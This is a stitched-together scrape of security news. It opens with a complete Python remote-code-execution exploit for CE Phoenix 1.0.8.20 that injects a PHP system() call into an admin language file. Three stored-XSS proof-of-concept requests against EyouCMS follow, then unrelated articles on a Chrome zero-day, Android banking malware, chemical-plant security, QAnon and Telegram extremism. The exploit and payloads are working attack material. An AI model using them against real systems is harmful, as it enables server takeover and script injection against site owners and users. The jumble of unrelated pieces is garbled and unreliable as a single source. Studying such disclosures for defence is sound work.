CE Phoenix version 1.0.8.20 remote code execution exploit written in Python.

    ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)#### Date: 2023-11-25#### Exploit Author: tmrswrr#### Category: Webapps#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)#### Version: v1.0.8.20#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)## EXPLOIT :import requestsfrom bs4 import BeautifulSoupimport sysimport urllib.parseimport randomfrom time import sleepclass colors:    OKBLUE = '\033[94m'    WARNING = '\033[93m'    FAIL = '\033[91m'    ENDC = '\033[0m'    BOLD = '\033[1m'    UNDERLINE = '\033[4m'    CBLACK = '\33[30m'    CRED = '\33[31m'    CGREEN = '\33[32m'    CYELLOW = '\33[33m'    CBLUE = '\33[34m'    CVIOLET = '\33[35m'    CBEIGE = '\33[36m'    CWHITE = '\33[37m' def entry_banner():    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,                    colors.CRED, colors.CBEIGE]    random.shuffle(color_random)    banner = color_random[0] + """     CE Phoenix v1.0.8.20 - Remote Code Execution \n     Author: tmrswrr    """    for char in banner:        print(char, end='')        sys.stdout.flush()        sleep(0.0045)def get_formid_and_cookies(session, url):    response = session.get(url, allow_redirects=True)    if response.ok:        soup = BeautifulSoup(response.text, 'html.parser')        formid_input = soup.find('input', {'name': 'formid'})        if formid_input:            return formid_input['value'], session.cookies    return None, Nonedef perform_exploit(session, url, username, password, command):    print("\n[+] Attempting to exploit the target...")       initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"    formid, cookies = get_formid_and_cookies(session, initial_url)    if not formid:        print("[-] Failed to retrieve initial formid.")        return    # Login    print("[+] Performing login...")    login_payload = {        'formid': formid,        'username': username,        'password': password    }    login_headers = {        'Content-Type': 'application/x-www-form-urlencoded',        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',        'Referer': initial_url    }    login_url = url + "/admin/login.php?action=process"    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)    if not login_response.ok:        print("[-] Login failed.")        print(login_response.text)        return    print("[+] Login successful.")    new_formid, _ = get_formid_and_cookies(session, login_response.url)    if not new_formid:        print("[-] Failed to retrieve new formid after login.")        return    # Exploit    print("[+] Executing the exploit...")    encoded_command = urllib.parse.quote_plus(command)    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"    exploit_headers = {        'Content-Type': 'application/x-www-form-urlencoded',        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',        'Referer': login_response.url    }    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)    if exploit_response.ok:        print("[+] Exploit executed successfully.")    else:        print("[-] Exploit failed.")        print(exploit_response.text)        final_response = session.get(url)    print("\n[+] Executed Command Output:\n")    print(final_response.text)  def main(base_url, username, password, command):    print("\n[+] Starting the exploitation process...")    session = requests.Session()    perform_exploit(session, base_url, username, password, command)if __name__ == "__main__":    entry_banner()    if len(sys.argv) < 5:        print("Usage: python script.py [URL] [username] [password] [command]")        sys.exit(1)    base_url = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]    command = sys.argv[4]    main(base_url, username, password, command)

CE Phoenix 1.0.8.20 Remote Code Execution

The vulnerability is among a rapidly growing number of zero-day bugs that major browser vendors have reported recently.

Source: PREMIO STOCK via Shutterstock

For the fourth time since August, Google has disclosed a bug in its Chrome browser technology that attackers were actively exploiting in the wild before the company had a fix for it.

**Integer Overflow Bug**

The latest zero-day, which Google is tracking as CVE-2023-6345, stems from an integer overflow issue in Skia, an open source 2D graphic library in Chrome. The bug is one of seven Chrome vulnerabilities for which Google issued a security update this week.

The company's advisory contained sparse details on CVE-2023-6345 beyond mentioning the fact that an exploit for it is publicly available. A brief description on NIST's National Vulnerability Database (NVD) site described the flaw as affecting versions of Chrome prior to 119.0.6045.199 and allowing a remote attacker who has "compromised the renderer process to potentially perform a sandbox escape via a malicious file." The NVD identified the bug as a high-severity issue.

Google credited researchers at its Threat Analysis Group for finding and reporting CVE-2023-6345 on Nov. 24.

The vulnerability is the seventh zero-day that Google has rushed to patch amid active exploit activity this year and is the latest manifestation of growing attacker interest in Chrome and other browsers.

**A Flood of Browser Zero-Days**

Since the beginning of this year, Apple, Google, Microsoft, and Firefox have all disclosed multiple critical vulnerabilities in their respective browsers, including a handful of zero-days. In some instances, a bug in some widely used component affected multiple browsers at once, as was the case with CVE-2023-4863, a zero-day heap overflow in WebP, a code library common to Chrome, Apple Safari, and Mozilla Firefox. In other instances, as with CVE-2023-5217, a zero-day bug in Chrome impacted multiple browsers based on Chromium technology, such as Microsoft Edge, Opera, Brave, and Vivaldi.

There were also multiple zero-days that Apple disclosed separately this year in its WebKit browser engine for Safari, including CVE-2023-28205 and three others in May: CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373. Both Microsoft and Mozilla have also separately reported other critical bugs in their respective browsers.

It is unclear which threat actor might be currently exploiting CVE-2023-6345, the bug that Google disclosed this week, or why. But in recent months, Google and Apple have warned about vendors of commercial surveillance products exploiting zero-day bugs in their respective browser technologies to drop spyware on Android, iOS, and other mobile devices. Google discovered CVE-2023-4863 after researchers at Apple and Toronto University Citizen Lab informed the company about a commercial vendor using the flaw to drop Predator spyware on Android and iOS devices.

**Ubiquitous Use**

Much of the growing attacker interest in browsers has to do with their ubiquitous use, says Lionel Litty, chief security architect at Menlo Security. The exploding use of Web applications has resulted in users spending most of their time on browsers for everything from accessing applications and webpages to additional content such as PDFs and other documents. Adding to this is the drive by Google to integrate even more features into its browser and make it a replacement for fat client technologies, Litty says. This includes enabling access to USB devices, Bluetooth, and even the GPU through the WebGPU interface.

"Despite all the care taken by Google engineers, we continue to see a steady stream of security issues that are exploitable, including many zero-days that are actually exploited," he says.

The fact that multiple browsers are based on Chromium is another reason for attackers targeting the technology, Litty notes. "Developing an exploit against Chrome usually means that it will work against all browsers, save Safari and Firefox, allowing bad actors to target more victims without any additional work."

Saeed Abbasi, manager of vulnerability and threat research at Qualys, points to similar reasons for Chrome's growing popularity among threat actors. "Additionally, the high commercial value of exploiting a widely used platform like Chrome attracts sophisticated attackers, including those backed by state sponsors," he says.

More generally, browser vulnerabilities present significant risks for organizations, Abbasi says. Attackers can use browser bugs to sneak malware and spyware into an organization. Additionally, attackers might exploit these weaknesses to steal login credentials and other data for potential future attacks.

"To mitigate risks from browser vulnerabilities, organizations should prioritize regular updates and patch management to keep browsers up to date," Abbasi notes. "Implementing network segmentation can restrict browser access to sensitive areas, reducing breach impacts."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Google Patches Another Chrome Zero-Day as Browser Attacks Mount

A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Document Properties field at /login.php m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn.

    POST /EyouCMS/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
    Host: 192.168.3.135
    Content-Length: 100
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.3.135
    Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=ArchivesFlag&a=index&lang=cn
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; users_id=1; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; ENV_GOBACK_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; workspaceParam=index%7CArchivesFlag
    Connection: close
    
    table=archives_flag&id_name=id&id_value=1&field=flag_name&value=<img src=1 onerror=alert(1)>

CVE-2023-48882: EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting · Issue #54 · weng-xianhu/eyoucms

A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Field Title field at /login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn.

    POST /EyouCMS/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1
    Host: 192.168.3.135
    Content-Length: 131
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.3.135
    Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=Field&a=arctype_add&lang=cn
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; users_id=1; admin-arctreeClicked-Arr=%5B%5D; ENV_GOBACK_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-treeClicked-Arr=%5B%5D; workspaceParam=arctype_index%7CField
    Connection: close
    
    title=<img src=1 onerror=alert(1)>&name=aaaaaaaa&dtype=text&dfvalue=aaaaaa&remark=aaaaaaaaaa&typeids%5B%5D=8&channel_id=-99

CVE-2023-48881: EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting · Issue #53 · weng-xianhu/eyoucms

A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Menu Name field at /login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn.

    POST /EyouCMS/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
    Host: 192.168.3.135
    Content-Length: 94
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.3.135
    Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=Member&a=ajax_menu_index&lang=cn
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=users_index%7CMember
    Connection: close
    
    table=users_menu&id_name=id&id_value=11&field=title&value=<img src=1 onerror=alert(1)>

CVE-2023-48880: EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting · Issue #52 · weng-xianhu/eyoucms

An Android malware campaign targeting Iranian banks has expanded its capabilities and incorporated additional evasion tactics to fly under the radar.
That's according to a new report from Zimperium, which discovered more than 200 malicious apps associated with the malicious operation, with the threat actor also observed carrying out phishing attacks against the targeted financial institutions.

Mobile Security / Malware

An Android malware campaign targeting Iranian banks has expanded its capabilities and incorporated additional evasion tactics to fly under the radar.

That's according to a new report from Zimperium, which discovered more than 200 malicious apps associated with the malicious operation, with the threat actor also observed carrying out phishing attacks against the targeted financial institutions.

The campaign first came to light in late July 2023 when Sophos detailed a cluster of 40 credential-harvesting apps targeting customers of Bank Mellat, Bank Saderat, Resalat Bank, and Central Bank of Iran.

The primary goal of the bogus apps is to trick victims into granting them extensive permissions as well as harvest banking login credentials and credit card details by abusing Android's accessibility services.

"The corresponding legitimate versions of the malicious apps are available at Cafe Bazaar, an Iranian Android marketplace, and have millions of downloads," Sophos researcher Pankaj Kohli said at the time.

"The malicious imitations, on the other hand, were available to download from a large number of relatively new domains, some of which the threat actors also employed as C2 servers."

Interestingly, some of these domains have also been observed to serve HTML phishing pages designed to steal credentials from mobile users.

The latest findings from Zimperium illustrate continued evolution of the threat, not only in terms of a broader set of targeted banks and cryptocurrency wallet apps, but also incorporating previously undocumented features that make it more potent.

This includes the use of the accessibility service to grant it additional permissions to intercept SMS messages, prevent uninstallation, and click on user interface elements.

Some variants of the malware have also been found to access a README file within GitHub repositories to extract a Base64-encoded version of the command-and-control (C2) server and phishing URLs.

"This allows attackers to quickly respond to phishing sites being taken down by updating the GitHub repository, ensuring that malicious apps are always getting the latest active phishing site," Zimperium researchers Aazim Yaswant and Vishnu Pratapagiri said.

Another noteworthy tactic is the use of intermediate C2 servers to host text files that contain the encoded strings pointing to the phishing sites.

While the campaign has so far trained its eyes on Android, there is evidence that Apple's iOS operating system is also a potential target based on the fact that the phishing sites verify if the page is opened by an iOS device, and if so, direct the victim to a website mimicking the iOS version of the Bank Saderat Iran app.

It's currently not clear if the iOS campaign is under development stages, or if the apps are distributed through an, as of yet, unidentified source.

The phishing campaigns are no less sophisticated, impersonating the actual websites to exfiltrate credentials, account numbers, device models, and IP addresses to two actor-controlled Telegram channels.

"It is evident that modern malware is becoming more sophisticated, and targets are expanding, so runtime visibility and protection are crucial for mobile applications," the researchers said.

The development comes a little over a month after Fingerprint demonstrated a method by which malicious Android apps can stealthily access and copy clipboard data by leveraging the SYSTEM\_ALERT\_WINDOW permission to obscure the toast notification that's displayed when a particular app is reading clipboard data.

"It's possible to overdraw a toast either with a different toast or with any other view, completely hiding the original toast can prevent the user from being notified of clipboard actions," Fingerprint said. "Any application with the SYSTEM\_ALERT\_WINDOW permission can read clipboard data without notifying the user."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

200+ Malicious Apps on Iranian Android Store Installed by Millions of Banking Users

Dropping the ball on chemical security has precipitated "a national security gap too great to ignore," CISA warns.

Source: TTstudio via Alamy Stock Photo

CISA warned this week that facilities maintaining dangerous chemicals across the US are no longer receiving adequate security support.

Compared with such industries as energy, water, and telecoms, cybersecurity professionals tend to be less au courant with the chemicals sector, despite the physical and cybersecurity threats it faces.

CISA used to plug that gap with its Chemical Facility Anti-Terrorism Standards (CFATS). In CISA's own words, CFATS "identifies and regulates high-risk facilities to ensure security measures are in place to reduce the risk that certain dangerous chemicals are weaponized by terrorists." But on July 28, Congress allowed the statutory authority of the CFATS program to expire.

Yesterday, in a blog marking the fourth monthiversary of that decision, CISA associate director for chemical security Kelly Murray warned that "the absence of the CFATS program is a national security gap too great to ignore," likely leading to security gaps, unsafe conditions, and possibly even access by a terrorist.

**Terrorist Threats to the Chemicals Industry**

There are four primary pillars to CFATS, each with an important security function.

Firstly, CISA has screened over 40,000 chemical facilities through the program, identifying 3,200 of them as high-risk. With four months of downtime, the agency estimates that at least 200 new facilities have likely acquired dangerous chemicals, and that "facilities could be stockpiling these chemicals in excess of their existing security precautions, increasing the risk of terrorist exploitation."

Equally, through CFATS, CISA worked with facilities to identify risks to them and their surroundings, and develop cyber and physical safety plans to mitigate those risks, improving their security postures by around 60%. As Murray explained, approximately one third of CISA's site visits historically tended to reveal security gaps, thus "we can safely estimate that hundreds of security gaps have gone unidentified since July."

Perhaps most importantly, chemical facilities used CFATS to run personnel against a Terrorist Screening Database. CISA used to vet an average of 9,000 names per month, flagging in all more than 10 individuals with terrorist ties. At these rates, Murray estimated, its missed screenings "likely would have identified an individual with or seeking access to dangerous chemicals as a known or suspected terrorist at some point over the past four months."

Lastly, CFATS was designed to help the chemical industry stay ahead of the evolving threat landscape, both from a physical and cyber standpoint. "Prior to the lapse in authority, this process was going to be further enhanced by a proposed rulemaking effort to enhance the physical and cybersecurity standards required of CFATS," Murray explained, though now no longer.

Murray ended the letter with a call to Congress to reinstate CFATS. "This is a resolution we cannot afford to break," she concluded.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

CISA to Congress: US Under Threat of Chemical Attacks

Musk’s recent use of the term “Q*Anon” is his most explicit endorsement of the movement to date. Conspiracists have since spent days dissecting its meaning and cheering on his apparent support.

With no new messages from Q in almost three years and former US President Donald Trump facing mounting legal woes, one would think that the QAnon political conspiracy was losing steam. But, on November 22, Elon Musk may have renewed hope for conspiracists around the world: As the US was preparing for Thanksgiving, Musk tweeted “Q\*Anon” out to his 164.5 million followers.

Musk’s post, which has been viewed 7.8 million times, linked to a story referencing a secret OpenAI project known as Q\* (pronounced Q star). Instantly, the online spaces where QAnon still flourishes—message boards, Telegram, and X itself—lit up with excited believers cheering Musk’s post. They claimed it was an endorsement of their worldview and, despite years of failed promises, confirmation that they were on the right path.

“Let’s gooooooo,” wrote Erica, a member of a prominent QAnon channel on Telegram, in response to Musk’s post. “The sheep will read QAnon \[and\] hopefully they’ll ask themselves why he did it, and look for answers, same way we all did,” a QAnon believer wrote on Truth Social. “Loud and Clear,” another wrote on X in a reply to Musk’s post.

Other QAnon figures flagged that the way Musk wrote QAnon—with a star symbol between Q and Anon—was a reference to the oft-used, and inaccurate, refrain within the community that claims the phrase QAnon is a media construction. “The asterisk separates Q and Anon,” an X user wrote in response to Musk’s post, “He knows exactly what he’s doing.” “Message received,” another wrote. On QAnon Telegram channels over the weekend, Musk’s recent posts were dissected as if there were messages written directly by Q, and some users decoded the dates and times of Musk’s posts on Twitter to try and discern a hidden meaning. QAnon believers also shared increasingly radical conspiracies about Musk, including apparent links between Musk’s tweet and the involvement of AI in the 2024 election. The same platforms where these discussions are occurring were also primary vectors for election conspiracies in 2020.

With the 2024 election now less than a year away, and almost a quarter of the country believing in some aspects of QAnon, it’s clear that the conspiracy movement could play a key role: Trump continues to court the group’s attention; one of their own, the QAnon Shaman, is now running for Congress; and, just last week, Marjorie Taylor Greene, a US representative from Georgia, appeared on one of the most popular online QAnon shows and discussed the conspiracy that the FBI was behind the January 6 attack on the Capitol. On X, the conspiracy and its promoters have flourished since Musk took control of the company last November. And now, Musk’s use of the term QAnon serves as the X owner’s most explicit endorsement of the movement to date.

Musk’s supporters were quick to defend his reference to QAnon, claiming in the replies that this was just Musk trolling. Even if he was, that doesn’t really matter: QAnon adherents see it not as a joke, but as a wholehearted endorsement from one of the most powerful people in the world. “While Musk isn’t explicitly endorsing QAnon, he’s making a thoughtless joke that Q believers will absolutely interpret as an endorsement,” Mike Rothschild, the author of _The Storm Is Upon Us_, a book about QAnon, wrote on X.

And while some QAnon followers realize Musk could be trolling, they also believe he is signaling to them. “The fact that he has been highlighting Q quite a bit over the last week or two is pretty interesting. One way to highlight is to troll. Musk does this often,” one user of a QAnon message board wrote, echoing similar comments from others.

This is hardly the first time Musk has interacted with and posted dog whistles to the QAnon community. Immediately after Musk took control of what was then Twitter, the platform reinstated the accounts of almost all the QAnon promoters who’d been banned from the platform in the wake of the Capitol riot. He has also interacted with many of them. In March, Musk posted “Free Jacob Chansley,” the man better known as the QAnon Shaman who is now running for Congress in Arizona. (At the end of March, Chansley was released early from a 41-month sentence in federal prison, which he’d been serving after taking part in the Capitol riot.)

Musk and X did not respond to WIRED’s request for comment.

A few days before Musk’s QAnon post, left-wing media watchdog Media Matters had published a report claiming that X was “placing ads for Apple, Bravo, IBM, Oracle, and Xfinity next to pro-Nazi content.” In response, Musk boosted a baseless conspiracy that Media Matters founder David Brock was linked to Pizzagate, the thoroughly-debunked precursor to QAnon that claimed Democrats were running a child sex trafficking operation from the basement of a pizza joint in Washington, DC. The Media Matters report also said that Musk has boosted the antisemitic conspiracy theory on X that Jewish people are helping “hordes of minorities” who are “flooding” into the country to replace white people. Days after the report was published, Musk filed a lawsuit against Media Matters.

Some influential QAnon figures have told their followers that they are now on the offensive against Media Matters, and claimed that the organization’s attacks on Musk are all part of a plot to disrupt the 2024 election. “They know what another year of increasing free speech on X does to all their precious false narratives in an election year in 2024. They need to take Musk and X out now,” a QAnon promoter who has organized a number of Q conferences in recent years wrote on his Telegram channel.

Elon Musk Is Giving QAnon Believers Hope Just in Time for the 2024 Elections

A WIRED analysis of more than 100 restricted channels shows these communities remain active, and content shared within them often spreads to channels accessible to the public.

In the wake of the October 7 Hamas attacks on Israel, people concerned about online extremism turned their attention to the encrypted messaging app Telegram, where a Hamas-aligned group posted graphic images of the group’s attacks to a channel that now has 1.9 million followers. That content was then shared widely across social media. Following public pressure on Apple and Google several weeks into the Israel-Hamas war, Telegram “restricted” two of the major channels used by Hamas. But it did not, as it may appear to some users, ban them.

A WIRED investigation reveals that rather than ban or delete Hamas channels or those run by right-wing extremist groups, Telegram is hiding them from the users of the two major app stores, but they are still there. Some of the content from restricted channels is being shared broadly in unrestricted ones—despite Telegram’s mechanisms for stopping the sharing of such content. The findings show that while Telegram makes some of its most violative communities difficult to find, the people in restricted channels are still able to spread their messages, experts say, and the channels continue to function as spaces of radicalization.

WIRED and Jeff Allen, cofounder of the tech policy think tank the Integrity Institute, analyzed over 100 restricted channels and thousands of posts over more than two months. Most of these channels include content related to right-wing extremism and other forms of radicalized hate. WIRED’s analysis found that most of these channels remained active even when restricted.

“What they’re doing is making \[channels\] not show up in your search and discoverability, but they’re keeping them on the back end,” says Nicole Stewart, assistant professor of digital media at Texas State University.

Founded by Pavel Durov in 2013, Telegram has long been a favorite platform for extremists. Its channels have no limit on the number of subscribers who can join (groups have a 200,000-person limit), and its approach to content moderation has meant that groups and content that might violate the terms of service on platforms like Facebook, Instagram, and X (formerly Twitter) remain accessible.

WIRED examined 108 restricted channels, including the Hamas-aligned channels Telegram restricted in late October, and 365 unrestricted channels over more than two months. Fifty-four of the public, unrestricted channels included content forwarded from the restricted channels, suggesting that they share overlapping membership. While some restricted channels have only a handful of messages per week, others, like the right-wing channel rlwolf\_9999, have upwards of 1,000.

Most of the channels were restricted during the months WIRED monitored them. However, in examining the Hamas channels that were restricted after the October 7 attacks, WIRED found that while content views dropped significantly—by about 70 percent—they still remained active, with the Hamas military-affiliated channel @qassambrigades continuing to share more than 20 pieces of content per day. Although views on the restricted channel often dipped, WIRED found that content from @qassambrigades was copied and pasted into the unrestricted channel @hpress, a popular news-focused channel that has over half a million subscribers.

“It’s not surprising that in a restricted environment that you’ll start to see that same network-sharing pattern,” says Stewart. “It’s what they do to share their own ideological beliefs and spread the message.”

Experts who study extremist groups on Telegram tell WIRED that the platform typically moderates these groups’ content in response to pressure from governments, law enforcement, or entities like Google and Apple that have the ability to restrict the app’s availability.

“What we seem to know from experience is that when Google and Apple say, ‘Hey, remove this,’ that’s when Telegram comes in and starts removing things,” claims Aleksandra Urman, a researcher at the University of Zurich who has studied Telegram and the far right in Europe. That also speaks about the “power of Google and Apple,” Urman says, because both companies are able to exert influence over Telegram’s moderation decisions.

While Telegram is available for download on Google Play and the Apple App Store, both Google and Apple disallow apps that promote hate speech, terrorism, and violent content. For example, Google’s terms of service say it doesn’t “allow apps with content related to planning, preparing, or glorifying violence against civilians” or “apps that promote violence, or incite hatred against individuals.” Apps that violate these standards can be removed from Google Play or the App Store, significantly limiting their availability. That both app stores offer Telegram for download suggests the app is complying with the companies’ terms of service.

Apple did not respond to a request for comment. Google spokesperson Danielle Cohen tells WIRED, “Play apps that contain or feature UGC \[user-generated content\], including apps which are specialized browsers or clients to direct users to a UGC platform, must implement robust, effective, and ongoing UGC moderation. This includes providing an in-app system for reporting objectionable UGC and users and taking action against that UGC and/or user where appropriate.”

Telegram did not respond to WIRED’s request for comment.

In 2021, Telegram released a version of the app that could be downloaded directly onto Android, which the company billed as having “fewer restrictions.” Downloading the app directly puts it outside the scope of Google Play’s terms of service. Users who have this “sideloaded” version of Telegram can continue to see and post in restricted channels that regular users can’t access.

Cohen, the Google spokesperson, tells WIRED that “Google does not control app distribution on Android,” noting that Android’s open operating system means apps can be downloaded from other Android app stores or directly to users via an app’s website.

Telegram’s terms of service state that users may not “promote violence on publicly viewable Telegram channels, bots, etc.,” but it says nothing about how the platform responds to users who violate these rules. Telegram did not respond to questions about how it assesses whether a channel should be restricted or banned entirely, as it has done to Islamic State-affiliated channels in the past.

In a post on his public Telegram channel on October 13, Durov addressed the pressure to remove Hamas channels and content, saying, “Every day, Telegram’s moderators and AI tools remove millions of obviously harmful content from our public platform.” He also asserted that because Telegram doesn’t algorithmically amplify content, “it’s unlikely that Telegram channels can be used to significantly amplify propaganda.”

While Telegram may not be algorithmically promoting content, it is used to spread hateful ideologies, experts say. “Hate groups and designated terrorist groups who are using the platform as a way to mobilize the troops, basically, they’re functioning as influencers,” says Stewart of Texas State University. Part of that work is sharing and promoting the posts and ideas of other aligned groups and influencers, pushing users deeper into the extremist ecosystem.

When a Telegram user from a restricted channel forwards content to a nonrestricted channel, that content won’t be visible to anyone in the channel who has downloaded the app from Apple’s App Store or Google Play. But a simple copy and paste easily circumvents this feature for text-based messages. WIRED and Allen found over 400 instances where text-based content was copied word for word into both restricted and nonrestricted channels, with users often tagging the restricted channels in the unrestricted ones. The analysis did not include images and videos, which also comprise a considerable amount of the content.

For instance, messages sent to an unrestricted channel called OfficialTheCollective, with more than 4,000 members, included tags to restricted channels like SpecialQForces, a QAnon conspiracy channel, and often encouraged users to join.

One message posted to OfficialTheCollective even instructs users how to get around Google and Apple’s restrictions, saying, “Google and Apple \[are\] censoring the Telegram app downloaded via Google Play and Apple App Store. Use the web browser.” The message includes instructions about how to sideload Telegram, including a link to an instructional video on the video platform Rumble, which is popular with right-wing influencers.

In the unrestricted ExpatsPortugalEngChannel, WIRED found a message referencing a riot by Eritrean migrants in Germany. “Where are all the liberals who wanted these invaders in their country with open arms?” the post reads. “WE need you to go talk to them nicely, go first before the NAZIS take charge since YOU going to need them now.” The text is identical to a post shared in the restricted channel @InTheEndGodAlwaysWins.

In some cases, Telegram will restrict channels based on local laws. This includes Germany, which has strict rules against hate speech and neo-Nazism. Heidi Schulze, a researcher at Ludwig-Maximilians-Universität München, says that she was able to access channels restricted in Germany by using VPNs and Dutch SIM cards, which tricked Telegram into treating her as though she weren’t in Germany at all. Channel restrictions “from Telegram’s perspective might be a smart thing because they’re adhering to the local laws, but they’re not deleting channels,” she claims, as it would allow the platform to retain its claim of protecting freedom of speech.

But Urman, of the University of Zurich, says that restricting the channels can also create a space for more radicalization. “People who are likely to follow these groups even after they are restricted, who really want to see that content and are going to seek out the technical possibilities to do that, are more likely to be more radical,” she says.

Having already been “deplatformed” in some capacity can also mean that content is likely to be more extreme because channel operators are no longer factoring in a fear of content moderation, according to Urman. “These groups, even when they are restricted, are probably conducive to radicalization,” she says. “You’re not going to plan, in most cases, a certain attack out in the open. But now you’re not in the open. You are among your club.”

Rita Katz, executive director and founder of SITE Intelligence Group, a consultancy that monitors terrorist groups online, believes the company’s decision whether to ban a channel likely hinges on laws and enforcement. “The European Union has strong-armed Telegram to take action against ISIS and al Qaeda since 2015, and the company acted even more surgically against the groups’ networks in 2019,” claims Katz. “Telegram began deleting whole channels and accounts, not only of administrators or ISIS- and al Qaeda-connected accounts but also of everyone in those chat groups and channels.”

When a user forwards a message from a restricted channel to a nonrestricted one, a notice will appear to anyone who doesn’t have the “sideloaded” version of the app saying that the message can’t be displayed on that user’s device. WIRED’s analysis of thousands of restricted pieces of content found that only 36 of them appeared with the notice that they were restricted for violating Telegram’s terms of service. This means that a majority of restricted channels and content appear to be an effort to comply with the policies of Google and Apple, which can drop the app from their stores.

“Unless Telegram’s operations are going to be threatened somehow,” claims Stewart, “it’s probably not a priority for them.”

Telegram’s Bans on Extremist Channels Aren't Really Bans

